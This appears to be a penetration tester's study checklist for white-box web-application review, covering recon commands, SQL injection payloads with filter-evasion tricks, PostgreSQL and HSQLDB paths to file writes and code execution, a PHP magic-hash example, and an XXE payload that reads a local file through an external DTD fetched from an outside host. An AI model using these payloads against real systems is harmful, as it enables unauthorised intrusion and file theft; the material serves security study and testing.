Code review

  • Initial discovery
    • Basic port scan
    • Default user accounts
    • Check cookies and response headers
    • Check how each user-controlled input reflects in the UI (XSS/SSTI)
    • Loose comparison in PHP (+ magic hashes)
    • Find deployment location using "ps -ef" or "Process Explorer"
    • grep -rnw "eval(" . --color
    • Regex for locating SQL query construction: ^.*?query.*?select.*?
    • Routing configuration
    • Whitelists/blacklists
    • "Random" usage, or MD5/SHA1 usage
    • Source of 404 and other error pages
    • README.md / CHANGELOG.md
      • while read l; do echo "===$l==="; curl $l/README.md -k; done < packages.txt
      • cat commands.html | grep -E "script.*src" | grep -Ev "vendor|lib|plugin"
      • wget --no-check-certificate -q -i list.txt
      • for f in compressed_*.js; do js-beautify $f > pretty/"${f//compressed_}"; done;
    • Identify libraries
      • wget https://github.com/nice-registry/all-the-package-names/raw/master/names.json
      • jq '.[0:10000]' names.json | grep ","| cut -d'"' -f 2 > npm-10000.txt
      • gobuster dir -w ./npm-10000.txt -u https://openitcockpit/js/vendor/ -k
    • Files
      • find ./ -iname "*.html"
      • grep -r "document.write" ./ --include *.html
    • Identify the WSS endpoint and the client code that interacts with it
    • Identify serialized values
    • Check network interfaces
    • /var/log/auth.log
  • Enabling Logging
    • Enable database query logs
    • PHP display_errors = ON
    • Log4j configurations
    • PHP - var_dump
    • Get error info
      • Using param[] instead of param to get error messages
      • Send invalid JSON/XML inputs
    • Writable files: find /var/www/html/ -type d -perm -o+w
    • Python debugging using PTVSD
  • Authentication related interesting functions
    • Session cookie has httpOnly flag set (stealing cookie over XSS)
    • Username enumeration
    • Login
    • Registration
    • Change password
    • Change email
    • Confirmation of email update
    • High authorization functions
  • SQLi
    • Check binary: OR (select 1)=1 --
    • Check binary with brackets: OR (select 1)=1) --
    • USERID=1;SELECT (CASE WHEN (1=1) THEN 1 ELSE 0 END)--
    • USERID=1; select+pg_sleep(10);--
    • USERID=1 UNION SELECT CASE WHEN (SELECT 1)=1 THEN 1 ELSE 0 END--
    • Escaping
      • Spaces with: /**/
      • Quotes with: hex notation, or by decoding/character functions, for example:
      • select convert_from(decode('QVdBRQ==', 'base64'), 'utf-8');
      • SELECT CHR(65) || CHR(87) || CHR(65) || CHR(69);
    • Write file
      • COPY TO/COPY FROM
      • LO_IMPORT/LO_EXPORT
    • RCE
      • PG extension (DLL)
      • Java PROCEDURE - HSQLDB
        • com.sun.org.apache.xml.internal.security.utils.JavaUtils.writeBytesToFilename
        • java.lang.System.getProperty
  • CSRF
    • Is CSRF protection present?
    • Can XSS be used to initiate a cross-origin request?
  • Steps
    • Which functions are exposed to unauthenticated users?
    • How do the admin panel / user panel check whether a user is logged in?
    • Login/registration/forgot-password/logout functions
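A worked illustration of the "Loose comparison in PHP (+ magic hashes)" item from the checklist above. This is an added example, not code from the original notes; weak_check and strict_check are hypothetical helper names. With the constructed inputs below, weak_check accepts the wrong password while strict_check rejects it.

```php
<?php
// Added example (not from the checklist): why "==" on hash strings is dangerous in PHP.
// md5()/sha1() occasionally yield hex digests of the form "0e" followed only by digits.
// PHP treats such strings as numeric (0 * 10^N), so "==" compares them as 0 == 0 and
// two completely different digests are reported equal. These are the "magic hashes".

// VULNERABLE (hypothetical helper): loose comparison of hex digests.
function weak_check(string $stored_hash, string $supplied): bool {
    return md5($supplied) == $stored_hash;
}

// HARDENED (hypothetical helper): hash_equals() is type-strict (no numeric coercion)
// and constant-time. For real password storage use password_hash()/password_verify().
function strict_check(string $stored_hash, string $supplied): bool {
    return hash_equals($stored_hash, md5($supplied));
}

// Constructed scenario: the account's real password is 'QNKCDZO', whose MD5 digest has
// the "0e<digits>" form, and the attempt '240610708' is a different string whose MD5
// digest also has that form. Both are well-known published magic-hash inputs.
$stored  = md5('QNKCDZO');
$attempt = '240610708';

var_dump(weak_check($stored, $attempt));    // loose comparison with a magic-hash input
var_dump(strict_check($stored, $attempt));  // strict comparison with the same input
var_dump(strict_check($stored, 'QNKCDZO')); // strict comparison with the real password
var_dump("0e1" == "0e2");                   // numeric-string comparison in isolation
```

During code review, grep for "==" (and "!=") applied to the result of md5(), sha1(), hash() or to tokens read from the request, and replace them with hash_equals() or "===".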

XXE

Contents of wrapper.dtd (served from the external host referenced in the %dtd declaration below):

<!ENTITY wrapper "%start;%file;%end;">

XML request body that loads the external DTD and wraps the file contents in a CDATA section:

<?xml version="1.0"?>
<!DOCTYPE data [
<!ENTITY % start "<![CDATA[">
<!ENTITY % file SYSTEM "file:///home/student/crx/data/hsqldb/dbmanager.sh" >
<!ENTITY % end "]]>">
<!ENTITY % dtd SYSTEM "http://192.168.119.120/wrapper.dtd" >
%dtd;
]>
<org.opencrx.kernel.account1.Contact>
<lastName>&wrapper;</lastName>
<firstName>Tom</firstName>
</org.opencrx.kernel.account1.Contact>

JavaScript keylogger via XSS